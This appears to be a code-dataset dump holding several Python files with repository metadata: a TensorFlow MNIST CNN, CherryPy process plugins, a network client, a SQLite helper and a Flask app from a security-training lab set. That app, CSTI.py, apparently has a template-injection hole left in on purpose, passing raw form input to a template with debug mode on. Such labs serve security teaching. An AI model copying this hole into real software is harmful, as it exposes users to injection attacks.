blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7ae305ba58e2d8d511726e15f0b30b5e25e26026
|
4c97a552e8bbcc8f5d832a33322a12ebb5d23f47
|
/python programs/loops/printingrevnumswhile.py
|
c2334439d72aca6f3ec55ba062cac5ee88853d9e
|
[] |
no_license
|
amsenthilkumar/ZenClass
|
afe5d9e4faba2eef0fa5920330dbe642e3742e1c
|
c4bb4d1c1cdec8c6aa8e59181db9d4dd4447c5d8
|
refs/heads/master
| 2021-06-28T10:41:49.366282
| 2020-06-02T10:17:01
| 2020-06-02T10:17:01
| 222,610,812
| 0
| 0
| null | 2021-03-20T02:23:23
| 2019-11-19T04:49:16
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 46
|
py
|
n=int(input())
while(n>0):
print(n)
n=n-1
|
[
"noreply@github.com"
] |
amsenthilkumar.noreply@github.com
|
fd80c62ae71a5f4cfe50e2f3f303aeea7284c25a
|
0b821ce06a3afe7a0e76a8d48be2858bdb378818
|
/python/ctp_py/network.py
|
eaa3604408c58de20b56fdee0c09cd08fc439f09
|
[] |
no_license
|
reinhardtken/refresh_phone
|
def9d688575c7550b2aad21823f218ce82bb43fd
|
ff958d456a665031acac2e1f607100f533bdf554
|
refs/heads/master
| 2020-04-04T20:07:29.143771
| 2019-01-25T11:22:21
| 2019-01-25T11:22:21
| 156,234,788
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import Queue
import asyncore
import logging
import socket
#====================================
import asyn_pb_client
import asyn_pb_client_keepalive
#====================================
class Network:
def __init__(self, queue, p1, p2):
print("Network.init=======================================")
self.queue = queue
self.asyn_pb_client = None
self.asyn_pb_client_keepalive = None
if p1 is not None:
self.asyn_pb_client = asyn_pb_client.ProtobufClient(p1)
#如果连接断开,直接退出
self.asyn_pb_client.shutdown_when_close = True
if p2 is not None:
self.asyn_pb_client_keepalive = asyn_pb_client_keepalive.KeepAliveProtobufClient(p2)
self.thread = threading.Thread(target = self.Work)
def Run(self):
self.thread.start()
print('after start')
def DealWithIncomeQueue(self):
#print('DealWithIncomeQueue')
while not self.queue.empty():
msg = self.queue.get()
self.asyn_pb_client.SendMsg(msg)
self.queue.task_done()
def Work(self):
if self.asyn_pb_client is not None:
self.asyn_pb_client.Connect()
if self.asyn_pb_client_keepalive is not None:
self.asyn_pb_client_keepalive.Connect()
while True:#self.asyn_pb_client.socket_map:
asyncore.loop(timeout = 1, count = 1)
self.DealWithIncomeQueue()
def Join(self):
self.thread.join()
#======================================
if __name__ == '__main__':
network = Network()
network.Run()
network.Join()
|
[
"reinhardtken@hotmail.com"
] |
reinhardtken@hotmail.com
|
a44f128f58bb23a4c624266d368973bf055909f5
|
4491549f0b1bbf5397ae0b56192605a7abcb61b0
|
/python/CSTI/CSTI.py
|
93a1621d660fd0f88430767eabc3c4c4f68a8f2c
|
[
"Apache-2.0"
] |
permissive
|
iNoSec2/skf-labs
|
81e9d400ccac1007632add23bd50a094de1f50d5
|
8af9edc83e313be1578c5dee0fd4ecdf7ac18a32
|
refs/heads/master
| 2023-08-17T00:20:12.274684
| 2023-08-04T13:13:10
| 2023-08-04T13:13:10
| 235,376,119
| 0
| 0
|
Apache-2.0
| 2023-08-05T00:31:43
| 2020-01-21T15:33:01
|
Python
|
UTF-8
|
Python
| false
| false
| 528
|
py
|
from flask import Flask, request, render_template
app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config['DEBUG'] = True
@app.route("/")
def start():
return render_template("index.html")
@app.route("/home", methods=['POST'])
def home():
CSTI = request.form['string']
return render_template("index.html",CSTI = CSTI)
@app.errorhandler(404)
def page_not_found(e):
return render_template("404.html")
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
[
"glenntencate@gmail.com"
] |
glenntencate@gmail.com
|
2c2b3763a7ae0d0cf2cd41d323716587148d7e40
|
2821dc3c68598b82f80b8a3a97be424ac0ba6cb7
|
/lab4/tensorflow-keras/mnist_cnn.py
|
2278b8a659099dbf7901e27f4987ea1cc7b96b5f
|
[
"Apache-2.0"
] |
permissive
|
paolo-26/SLNN
|
a21d1c6fef3965b537908216ccf94628c7dce3b6
|
492801b3423f4268d2b1a46d504650e6e2263aca
|
refs/heads/master
| 2020-04-03T16:50:48.054721
| 2019-02-22T19:44:57
| 2019-02-22T19:44:57
| 155,421,477
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,780
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib.keras import layers
from tensorflow.contrib.keras import models
from tensorflow.contrib.keras import initializers
import sys
import argparse
# global flags for convenience
FLAGS=None
# Parameters
NUM_PIXELS = 28
NUM_CLASSES = 10
BATCH_SIZE = 50
TRAIN_STEPS = 500
NUM_FILTERS_1 = 100
NUM_FILTERS_2 = 50
def classifier_model():
model = models.Sequential()
model.add(layers.Conv2D(NUM_FILTERS_1, 3 ,strides=(2, 2),
activation='relu', input_shape=(28,28,1), dilation_rate=(1,1),
padding='same', kernel_initializer=initializers.glorot_normal(),
bias_initializer=initializers.Zeros()))
model.add(layers.Conv2D(NUM_FILTERS_2, 3 ,strides=(2, 2),
activation='relu', use_bias='True', dilation_rate=(1,1),
padding='same', kernel_initializer=initializers.glorot_normal(),
bias_initializer=initializers.Zeros()))
model.add(layers.Flatten())
model.add(layers.Dense(10, use_bias='True',
kernel_initializer=initializers.glorot_normal(),
bias_initializer=initializers.Zeros()))
return model
def train_and_test(_):
# Check if log_dir exists, if so delete contents
if tf.gfile.Exists(FLAGS.log_dir):
tf.gfile.DeleteRecursively(FLAGS.log_dir)
tf.gfile.MakeDirs(FLAGS.log_dir)
# Import data
mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True, reshape=False)
# define placeholders for batch of training images and labels
x = tf.placeholder(tf.float32, shape=(None, NUM_PIXELS, NUM_PIXELS, 1), name='input_data')
y = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES), name='hot_vector')
# create model
my_mod = classifier_model()
my_mod.summary()
# use model on input image batch to compute logits
h = my_mod(x)
# define loss function
loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=h)
loss = tf.reduce_mean(loss, axis=0)
# make the loss a "summary" to visualise it in tensorboard
tf.summary.scalar('loss', loss)
# define the optimizer and what is optimizing
optimizer = tf.train.GradientDescentOptimizer(0.5)
train_step = optimizer.minimize(loss)
# Measure accuracy on the batch and make it a summary for tensorboard.
a = tf.argmax(y, axis=1)
b = tf.argmax(h, axis=1)
acc = tf.equal(a, b)
acc = tf.cast(acc, tf.float32)
accuracy = tf.reduce_mean(acc)
tf.summary.scalar('accuracy', accuracy)
# Create session.
sess = tf.InteractiveSession()
# Merge summaries for tensorboard.
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(FLAGS.log_dir + '/train', sess.graph)
# Initialize variables.
tf.global_variables_initializer().run()
for i in range(1, TRAIN_STEPS):
batch_xs , batch_ys = mnist.train.next_batch(BATCH_SIZE)
summary_train, _ = sess.run([merged, train_step],
feed_dict={x:batch_xs, y:batch_ys})
train_writer.add_summary(summary_train, i)
batch_xs , batch_ys = mnist.test.next_batch(10000)
test_accuracy = sess.run(accuracy, feed_dict={x:batch_xs, y:batch_ys})
print('Test accuracy: %.4f' % test_accuracy)
###################################################################################
if __name__ == '__main__':
# use nice argparse module to aprte cli arguments
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data_dir/', help='Directory for training data')
parser.add_argument('--log_dir', type=str, default='./log_dir/', help='Directory for Tensorboard event files')
FLAGS, unparsed = parser.parse_known_args()
# app.run is a simple wrapper that parses flags and sends them to main function
tf.app.run(main=train_and_test, argv=[sys.argv[0]] + unparsed)
|
[
"paolo.1995@ymail.com"
] |
paolo.1995@ymail.com
|
bfa90fa5a9d82c7635b2671ee7a7af3ac54de232
|
e89aaf63a9593ff112708598b0f476c43599ead4
|
/cherrypy/process/plugins.py
|
4d7dcbfd48fb57aec8127f03a6abce5dd76a489a
|
[
"BSD-3-Clause"
] |
permissive
|
Vungle/cherrypy-3.2.4
|
60eb11c83efd803dc1c728602756d343ca9632a4
|
c4ef67a49a71445eb7caa9d94565cb5aace69699
|
refs/heads/master
| 2021-01-01T19:16:27.047678
| 2014-03-04T22:41:56
| 2014-03-04T22:41:56
| 16,367,063
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,827
|
py
|
"""Site services for use with a Web Site Process Bus."""
import os
import re
import signal as _signal
import sys
import time
import threading
from cherrypy._cpcompat import basestring, get_daemon, get_thread_ident
from cherrypy._cpcompat import ntob, set, Timer, SetDaemonProperty
# _module__file__base is used by Autoreload to make
# absolute any filenames retrieved from sys.modules which are not
# already absolute paths. This is to work around Python's quirk
# of importing the startup script and using a relative filename
# for it in sys.modules.
#
# Autoreload examines sys.modules afresh every time it runs. If an application
# changes the current directory by executing os.chdir(), then the next time
# Autoreload runs, it will not be able to find any filenames which are
# not absolute paths, because the current directory is not the same as when the
# module was first imported. Autoreload will then wrongly conclude the file
# has "changed", and initiate the shutdown/re-exec sequence.
# See ticket #917.
# For this workaround to have a decent probability of success, this module
# needs to be imported as early as possible, before the app has much chance
# to change the working directory.
_module__file__base = os.getcwd()
class SimplePlugin(object):
"""Plugin base class which auto-subscribes methods for known channels."""
bus = None
"""A :class:`Bus <cherrypy.process.wspbus.Bus>`, usually cherrypy.engine.
"""
def __init__(self, bus):
self.bus = bus
def subscribe(self):
"""Register this object as a (multi-channel) listener on the bus."""
for channel in self.bus.listeners:
# Subscribe self.start, self.exit, etc. if present.
method = getattr(self, channel, None)
if method is not None:
self.bus.subscribe(channel, method)
def unsubscribe(self):
"""Unregister this object as a listener on the bus."""
for channel in self.bus.listeners:
# Unsubscribe self.start, self.exit, etc. if present.
method = getattr(self, channel, None)
if method is not None:
self.bus.unsubscribe(channel, method)
class SignalHandler(object):
"""Register bus channels (and listeners) for system signals.
You can modify what signals your application listens for, and what it does
when it receives signals, by modifying :attr:`SignalHandler.handlers`,
a dict of {signal name: callback} pairs. The default set is::
handlers = {'SIGTERM': self.bus.exit,
'SIGHUP': self.handle_SIGHUP,
'SIGUSR1': self.bus.graceful,
}
The :func:`SignalHandler.handle_SIGHUP`` method calls
:func:`bus.restart()<cherrypy.process.wspbus.Bus.restart>`
if the process is daemonized, but
:func:`bus.exit()<cherrypy.process.wspbus.Bus.exit>`
if the process is attached to a TTY. This is because Unix window
managers tend to send SIGHUP to terminal windows when the user closes them.
Feel free to add signals which are not available on every platform.
The :class:`SignalHandler` will ignore errors raised from attempting
to register handlers for unknown signals.
"""
handlers = {}
"""A map from signal names (e.g. 'SIGTERM') to handlers (e.g. bus.exit)."""
signals = {}
"""A map from signal numbers to names."""
for k, v in vars(_signal).items():
if k.startswith('SIG') and not k.startswith('SIG_'):
signals[v] = k
del k, v
def __init__(self, bus):
self.bus = bus
# Set default handlers
self.handlers = {'SIGTERM': self.bus.exit,
'SIGHUP': self.handle_SIGHUP,
'SIGUSR1': self.bus.graceful,
}
if sys.platform[:4] == 'java':
del self.handlers['SIGUSR1']
self.handlers['SIGUSR2'] = self.bus.graceful
self.bus.log("SIGUSR1 cannot be set on the JVM platform. "
"Using SIGUSR2 instead.")
self.handlers['SIGINT'] = self._jython_SIGINT_handler
self._previous_handlers = {}
def _jython_SIGINT_handler(self, signum=None, frame=None):
# See http://bugs.jython.org/issue1313
self.bus.log('Keyboard Interrupt: shutting down bus')
self.bus.exit()
def subscribe(self):
"""Subscribe self.handlers to signals."""
for sig, func in self.handlers.items():
try:
self.set_handler(sig, func)
except ValueError:
pass
def unsubscribe(self):
"""Unsubscribe self.handlers from signals."""
for signum, handler in self._previous_handlers.items():
signame = self.signals[signum]
if handler is None:
self.bus.log("Restoring %s handler to SIG_DFL." % signame)
handler = _signal.SIG_DFL
else:
self.bus.log("Restoring %s handler %r." % (signame, handler))
try:
our_handler = _signal.signal(signum, handler)
if our_handler is None:
self.bus.log("Restored old %s handler %r, but our "
"handler was not registered." %
(signame, handler), level=30)
except ValueError:
self.bus.log("Unable to restore %s handler %r." %
(signame, handler), level=40, traceback=True)
def set_handler(self, signal, listener=None):
"""Subscribe a handler for the given signal (number or name).
If the optional 'listener' argument is provided, it will be
subscribed as a listener for the given signal's channel.
If the given signal name or number is not available on the current
platform, ValueError is raised.
"""
if isinstance(signal, basestring):
signum = getattr(_signal, signal, None)
if signum is None:
raise ValueError("No such signal: %r" % signal)
signame = signal
else:
try:
signame = self.signals[signal]
except KeyError:
raise ValueError("No such signal: %r" % signal)
signum = signal
prev = _signal.signal(signum, self._handle_signal)
self._previous_handlers[signum] = prev
if listener is not None:
self.bus.log("Listening for %s." % signame)
self.bus.subscribe(signame, listener)
def _handle_signal(self, signum=None, frame=None):
"""Python signal handler (self.set_handler subscribes it for you)."""
signame = self.signals[signum]
self.bus.log("Caught signal %s." % signame)
self.bus.publish(signame)
def handle_SIGHUP(self):
"""Restart if daemonized, else exit."""
if os.isatty(sys.stdin.fileno()):
# not daemonized (may be foreground or background)
self.bus.log("SIGHUP caught but not daemonized. Exiting.")
self.bus.exit()
else:
self.bus.log("SIGHUP caught while daemonized. Restarting.")
self.bus.restart()
try:
import pwd
import grp
except ImportError:
pwd, grp = None, None
class DropPrivileges(SimplePlugin):
"""Drop privileges. uid/gid arguments not available on Windows.
Special thanks to `Gavin Baker <http://antonym.org/2005/12/dropping-privileges-in-python.html>`_
"""
def __init__(self, bus, umask=None, uid=None, gid=None):
SimplePlugin.__init__(self, bus)
self.finalized = False
self.uid = uid
self.gid = gid
self.umask = umask
def _get_uid(self):
return self._uid
def _set_uid(self, val):
if val is not None:
if pwd is None:
self.bus.log("pwd module not available; ignoring uid.",
level=30)
val = None
elif isinstance(val, basestring):
val = pwd.getpwnam(val)[2]
self._uid = val
uid = property(_get_uid, _set_uid,
doc="The uid under which to run. Availability: Unix.")
def _get_gid(self):
return self._gid
def _set_gid(self, val):
if val is not None:
if grp is None:
self.bus.log("grp module not available; ignoring gid.",
level=30)
val = None
elif isinstance(val, basestring):
val = grp.getgrnam(val)[2]
self._gid = val
gid = property(_get_gid, _set_gid,
doc="The gid under which to run. Availability: Unix.")
def _get_umask(self):
return self._umask
def _set_umask(self, val):
if val is not None:
try:
os.umask
except AttributeError:
self.bus.log("umask function not available; ignoring umask.",
level=30)
val = None
self._umask = val
umask = property(
_get_umask,
_set_umask,
doc="""The default permission mode for newly created files and
directories.
Usually expressed in octal format, for example, ``0644``.
Availability: Unix, Windows.
""")
def start(self):
# uid/gid
def current_ids():
"""Return the current (uid, gid) if available."""
name, group = None, None
if pwd:
name = pwd.getpwuid(os.getuid())[0]
if grp:
group = grp.getgrgid(os.getgid())[0]
return name, group
if self.finalized:
if not (self.uid is None and self.gid is None):
self.bus.log('Already running as uid: %r gid: %r' %
current_ids())
else:
if self.uid is None and self.gid is None:
if pwd or grp:
self.bus.log('uid/gid not set', level=30)
else:
self.bus.log('Started as uid: %r gid: %r' % current_ids())
if self.gid is not None:
os.setgid(self.gid)
os.setgroups([])
if self.uid is not None:
os.setuid(self.uid)
self.bus.log('Running as uid: %r gid: %r' % current_ids())
# umask
if self.finalized:
if self.umask is not None:
self.bus.log('umask already set to: %03o' % self.umask)
else:
if self.umask is None:
self.bus.log('umask not set', level=30)
else:
old_umask = os.umask(self.umask)
self.bus.log('umask old: %03o, new: %03o' %
(old_umask, self.umask))
self.finalized = True
# This is slightly higher than the priority for server.start
# in order to facilitate the most common use: starting on a low
# port (which requires root) and then dropping to another user.
start.priority = 77
class Daemonizer(SimplePlugin):
"""Daemonize the running script.
Use this with a Web Site Process Bus via::
Daemonizer(bus).subscribe()
When this component finishes, the process is completely decoupled from
the parent environment. Please note that when this component is used,
the return code from the parent process will still be 0 if a startup
error occurs in the forked children. Errors in the initial daemonizing
process still return proper exit codes. Therefore, if you use this
plugin to daemonize, don't use the return code as an accurate indicator
of whether the process fully started. In fact, that return code only
indicates if the process succesfully finished the first fork.
"""
def __init__(self, bus, stdin='/dev/null', stdout='/dev/null',
stderr='/dev/null'):
SimplePlugin.__init__(self, bus)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.finalized = False
def start(self):
if self.finalized:
self.bus.log('Already deamonized.')
# forking has issues with threads:
# http://www.opengroup.org/onlinepubs/000095399/functions/fork.html
# "The general problem with making fork() work in a multi-threaded
# world is what to do with all of the threads..."
# So we check for active threads:
if threading.activeCount() != 1:
self.bus.log('There are %r active threads. '
'Daemonizing now may cause strange failures.' %
threading.enumerate(), level=30)
# See http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
# (or http://www.faqs.org/faqs/unix-faq/programmer/faq/ section 1.7)
# and http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
# Finish up with the current stdout/stderr
sys.stdout.flush()
sys.stderr.flush()
# Do first fork.
try:
pid = os.fork()
if pid == 0:
# This is the child process. Continue.
pass
else:
# This is the first parent. Exit, now that we've forked.
self.bus.log('Forking once.')
os._exit(0)
except OSError:
# Python raises OSError rather than returning negative numbers.
exc = sys.exc_info()[1]
sys.exit("%s: fork #1 failed: (%d) %s\n"
% (sys.argv[0], exc.errno, exc.strerror))
os.setsid()
# Do second fork
try:
pid = os.fork()
if pid > 0:
self.bus.log('Forking twice.')
os._exit(0) # Exit second parent
except OSError:
exc = sys.exc_info()[1]
sys.exit("%s: fork #2 failed: (%d) %s\n"
% (sys.argv[0], exc.errno, exc.strerror))
os.chdir("/")
os.umask(0)
si = open(self.stdin, "r")
so = open(self.stdout, "a+")
se = open(self.stderr, "a+")
# os.dup2(fd, fd2) will close fd2 if necessary,
# so we don't explicitly close stdin/out/err.
# See http://docs.python.org/lib/os-fd-ops.html
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
self.bus.log('Daemonized to PID: %s' % os.getpid())
self.finalized = True
start.priority = 65
class PIDFile(SimplePlugin):
"""Maintain a PID file via a WSPBus."""
def __init__(self, bus, pidfile):
SimplePlugin.__init__(self, bus)
self.pidfile = pidfile
self.finalized = False
def start(self):
pid = os.getpid()
if self.finalized:
self.bus.log('PID %r already written to %r.' % (pid, self.pidfile))
else:
open(self.pidfile, "wb").write(ntob("%s\n" % pid, 'utf8'))
self.bus.log('PID %r written to %r.' % (pid, self.pidfile))
self.finalized = True
start.priority = 70
def exit(self):
try:
os.remove(self.pidfile)
self.bus.log('PID file removed: %r.' % self.pidfile)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
class PerpetualTimer(Timer):
"""A responsive subclass of threading.Timer whose run() method repeats.
Use this timer only when you really need a very interruptible timer;
this checks its 'finished' condition up to 20 times a second, which can
results in pretty high CPU usage
"""
def __init__(self, *args, **kwargs):
"Override parent constructor to allow 'bus' to be provided."
self.bus = kwargs.pop('bus', None)
super(PerpetualTimer, self).__init__(*args, **kwargs)
def run(self):
while True:
self.finished.wait(self.interval)
if self.finished.isSet():
return
try:
self.function(*self.args, **self.kwargs)
except Exception:
if self.bus:
self.bus.log(
"Error in perpetual timer thread function %r." %
self.function, level=40, traceback=True)
# Quit on first error to avoid massive logs.
raise
class BackgroundTask(SetDaemonProperty, threading.Thread):
"""A subclass of threading.Thread whose run() method repeats.
Use this class for most repeating tasks. It uses time.sleep() to wait
for each interval, which isn't very responsive; that is, even if you call
self.cancel(), you'll have to wait until the sleep() call finishes before
the thread stops. To compensate, it defaults to being daemonic, which means
it won't delay stopping the whole process.
"""
def __init__(self, interval, function, args=[], kwargs={}, bus=None):
threading.Thread.__init__(self)
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.running = False
self.bus = bus
# default to daemonic
self.daemon = True
def cancel(self):
self.running = False
def run(self):
self.running = True
while self.running:
time.sleep(self.interval)
if not self.running:
return
try:
self.function(*self.args, **self.kwargs)
except Exception:
if self.bus:
self.bus.log("Error in background task thread function %r."
% self.function, level=40, traceback=True)
# Quit on first error to avoid massive logs.
raise
class Monitor(SimplePlugin):
"""WSPBus listener to periodically run a callback in its own thread."""
callback = None
"""The function to call at intervals."""
frequency = 60
"""The time in seconds between callback runs."""
thread = None
"""A :class:`BackgroundTask<cherrypy.process.plugins.BackgroundTask>`
thread.
"""
def __init__(self, bus, callback, frequency=60, name=None):
SimplePlugin.__init__(self, bus)
self.callback = callback
self.frequency = frequency
self.thread = None
self.name = name
def start(self):
"""Start our callback in its own background thread."""
if self.frequency > 0:
threadname = self.name or self.__class__.__name__
if self.thread is None:
self.thread = BackgroundTask(self.frequency, self.callback,
bus=self.bus)
self.thread.setName(threadname)
self.thread.start()
self.bus.log("Started monitor thread %r." % threadname)
else:
self.bus.log("Monitor thread %r already started." % threadname)
start.priority = 70
def stop(self):
"""Stop our callback's background task thread."""
if self.thread is None:
self.bus.log("No thread running for %s." %
self.name or self.__class__.__name__)
else:
if self.thread is not threading.currentThread():
name = self.thread.getName()
self.thread.cancel()
if not get_daemon(self.thread):
self.bus.log("Joining %r" % name)
self.thread.join()
self.bus.log("Stopped thread %r." % name)
self.thread = None
def graceful(self):
"""Stop the callback's background task thread and restart it."""
self.stop()
self.start()
class Autoreloader(Monitor):
"""Monitor which re-executes the process when files change.
This :ref:`plugin<plugins>` restarts the process (via :func:`os.execv`)
if any of the files it monitors change (or is deleted). By default, the
autoreloader monitors all imported modules; you can add to the
set by adding to ``autoreload.files``::
cherrypy.engine.autoreload.files.add(myFile)
If there are imported files you do *not* wish to monitor, you can
adjust the ``match`` attribute, a regular expression. For example,
to stop monitoring cherrypy itself::
cherrypy.engine.autoreload.match = r'^(?!cherrypy).+'
Like all :class:`Monitor<cherrypy.process.plugins.Monitor>` plugins,
the autoreload plugin takes a ``frequency`` argument. The default is
1 second; that is, the autoreloader will examine files once each second.
"""
files = None
"""The set of files to poll for modifications."""
frequency = 1
"""The interval in seconds at which to poll for modified files."""
match = '.*'
"""A regular expression by which to match filenames."""
def __init__(self, bus, frequency=1, match='.*'):
self.mtimes = {}
self.files = set()
self.match = match
Monitor.__init__(self, bus, self.run, frequency)
def start(self):
"""Start our own background task thread for self.run."""
if self.thread is None:
self.mtimes = {}
Monitor.start(self)
start.priority = 70
def sysfiles(self):
"""Return a Set of sys.modules filenames to monitor."""
files = set()
for k, m in sys.modules.items():
if re.match(self.match, k):
if (
hasattr(m, '__loader__') and
hasattr(m.__loader__, 'archive')
):
f = m.__loader__.archive
else:
f = getattr(m, '__file__', None)
if f is not None and not os.path.isabs(f):
# ensure absolute paths so a os.chdir() in the app
# doesn't break me
f = os.path.normpath(
os.path.join(_module__file__base, f))
files.add(f)
return files
def run(self):
"""Reload the process if registered files have been modified."""
for filename in self.sysfiles() | self.files:
if filename:
if filename.endswith('.pyc'):
filename = filename[:-1]
oldtime = self.mtimes.get(filename, 0)
if oldtime is None:
# Module with no .py file. Skip it.
continue
try:
mtime = os.stat(filename).st_mtime
except OSError:
# Either a module with no .py file, or it's been deleted.
mtime = None
if filename not in self.mtimes:
# If a module has no .py file, this will be None.
self.mtimes[filename] = mtime
else:
if mtime is None or mtime > oldtime:
# The file has been deleted or modified.
self.bus.log("Restarting because %s changed." %
filename)
self.thread.cancel()
self.bus.log("Stopped thread %r." %
self.thread.getName())
self.bus.restart()
return
class ThreadManager(SimplePlugin):
"""Manager for HTTP request threads.
If you have control over thread creation and destruction, publish to
the 'acquire_thread' and 'release_thread' channels (for each thread).
This will register/unregister the current thread and publish to
'start_thread' and 'stop_thread' listeners in the bus as needed.
If threads are created and destroyed by code you do not control
(e.g., Apache), then, at the beginning of every HTTP request,
publish to 'acquire_thread' only. You should not publish to
'release_thread' in this case, since you do not know whether
the thread will be re-used or not. The bus will call
'stop_thread' listeners for you when it stops.
"""
threads = None
"""A map of {thread ident: index number} pairs."""
def __init__(self, bus):
self.threads = {}
SimplePlugin.__init__(self, bus)
self.bus.listeners.setdefault('acquire_thread', set())
self.bus.listeners.setdefault('start_thread', set())
self.bus.listeners.setdefault('release_thread', set())
self.bus.listeners.setdefault('stop_thread', set())
def acquire_thread(self):
"""Run 'start_thread' listeners for the current thread.
If the current thread has already been seen, any 'start_thread'
listeners will not be run again.
"""
thread_ident = get_thread_ident()
if thread_ident not in self.threads:
# We can't just use get_ident as the thread ID
# because some platforms reuse thread ID's.
i = len(self.threads) + 1
self.threads[thread_ident] = i
self.bus.publish('start_thread', i)
def release_thread(self):
"""Release the current thread and run 'stop_thread' listeners."""
thread_ident = get_thread_ident()
i = self.threads.pop(thread_ident, None)
if i is not None:
self.bus.publish('stop_thread', i)
def stop(self):
"""Release all threads and run all 'stop_thread' listeners."""
for thread_ident, i in self.threads.items():
self.bus.publish('stop_thread', i)
self.threads.clear()
graceful = stop
|
[
"ben.reiter@vungle.com"
] |
ben.reiter@vungle.com
|
3cb2017e792254a5cf2a3c9db8253320af6ea929
|
8ae4f2696299e86032e2debfea39d586934ab170
|
/database/_database/python_files/function_stack_update.py
|
ba0409db14935d6038bfcd570817ba47e177fd51
|
[
"MIT"
] |
permissive
|
gendry/solpybas
|
a5dd9592a59f3a9a25533e8b3502412ae5f1c2dd
|
1ff8554f0871994871a0878464fac5bb47428d1d
|
refs/heads/master
| 2020-06-01T20:54:09.352841
| 2019-07-23T16:20:58
| 2019-07-23T16:20:58
| 190,923,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,475
|
py
|
import sqlite3
#This generically adds stuff to the depositions / treatments and dep_conds / treatmetn_conds tables...
def stack_update_function(self, conn, dsp_lst, stack_dict, device_stack_id):
status = 'No status yet'
#TABLE device_stacks (id INTEGER PRIMARY KEY, stack_name TEXT, bot_elec_pat INTEGER, top_elec_pat INTEGER)
#TABLE device_stack_parts (id INTEGER PRIMARY KEY, device_stack_id INTEGER, stack_name TEXT, type_id INTEGER, part_id INTEGER)
#This will be the new device_stacks_part id
device_stacks_part_max_id = conn.execute('SELECT max(id) FROM device_stack_parts')
device_stacks_part_max_id_result = device_stacks_part_max_id.fetchone()[0]
#if an id exists increment it to use for later inserts or use 0 if not
#this won't work if there is only one record i.e. returns a zero
#convert to string to test truth value
string_device_stacks_part_max_id_result = str(device_stacks_part_max_id_result)
if string_device_stacks_part_max_id_result == 'None':
device_stacks_part_id = 0
else:
device_stacks_part_id = device_stacks_part_max_id_result + 1
conn.execute('UPDATE device_stacks SET top_elec_pat = ?, bot_elec_pat = ? WHERE id = ?', (stack_dict['top_elec_pat'],stack_dict['bot_elec_pat'],device_stack_id,));
#The dsp_lst contains a list of dicts with the entries for the commit to dsp table
for dsp_dict in dsp_lst:
dsp_dict['device_stack_id'] = device_stack_id
conn.execute("INSERT INTO device_stack_parts (id) VALUES (?)", (device_stacks_part_id,));
#build a search statement to use later as go through the values
#there must be a nicer way...
search_statement = "SELECT id FROM device_stack_parts WHERE "
search_statement_and = ''
search_statement_list = []
#find the names of the columns in the table returns a list of tuples
search_test = conn.execute("pragma table_info('device_stack_parts')");
test = search_test.fetchall()
column_dict = {}
for i in test:
column_dict['%s' % str(i[1])] = None
del column_dict['id']
for key in dsp_dict:
answer = dsp_dict['%s' % key]
column_dict['%s' % key] = answer
for key, value in column_dict.iteritems():
if value == None:
conn.execute("UPDATE device_stack_parts SET "+key+" = ? WHERE id = ?", (value, device_stacks_part_id,));
search_statement_and = search_statement_and + ' AND ' + key + ' IS NULL'
else:
conn.execute("UPDATE device_stack_parts SET "+key+" = ? WHERE id = ?", (value, device_stacks_part_id,));
search_statement_and = search_statement_and + ' AND ' + key + ' = ?'
search_statement_list.append(value)
#Dont bother checking...
#search_statement = search_statement + search_statement_and[4:]
#search_statement_list = tuple(search_statement_list)
#search_results = conn.execute(search_statement, search_statement_list);
#result = search_results.fetchall()
#result = [i[0] for i in result]
#if len(result) < 2:
print "Record created successfully, id = %s" % device_stack_id
status = 'Record created successfully, id = %s' % device_stack_id
device_stacks_part_id = device_stacks_part_id+1
#else:
#result.remove(device_stacks_part_id)
#print "Record already exists, id = %s" % result[0]
#status = "Record already exists, id = %s" % result[0]
#conn.execute("DELETE FROM device_stack_parts WHERE id = ?", (device_stacks_part_id,));
#result[0] = device_stacks_part_id
#this is a mess
conn.commit()
#conn.close()
return device_stack_id, status
|
[
"833625@swansea.ac.uk"
] |
833625@swansea.ac.uk
|
55e6bf144a154ad0a793bd5e4c8003ba57282762
|
a6856778fcd6c7525d099a370a2d8929bda56c84
|
/rango/migrations/0002_auto_20180121_1803.py
|
e0b2261167de62a13e8cf571375c23bf07c12d37
|
[] |
no_license
|
marto12345/tango_with_django_project
|
45388cd54f8755aa1d90564ed7831138ac892955
|
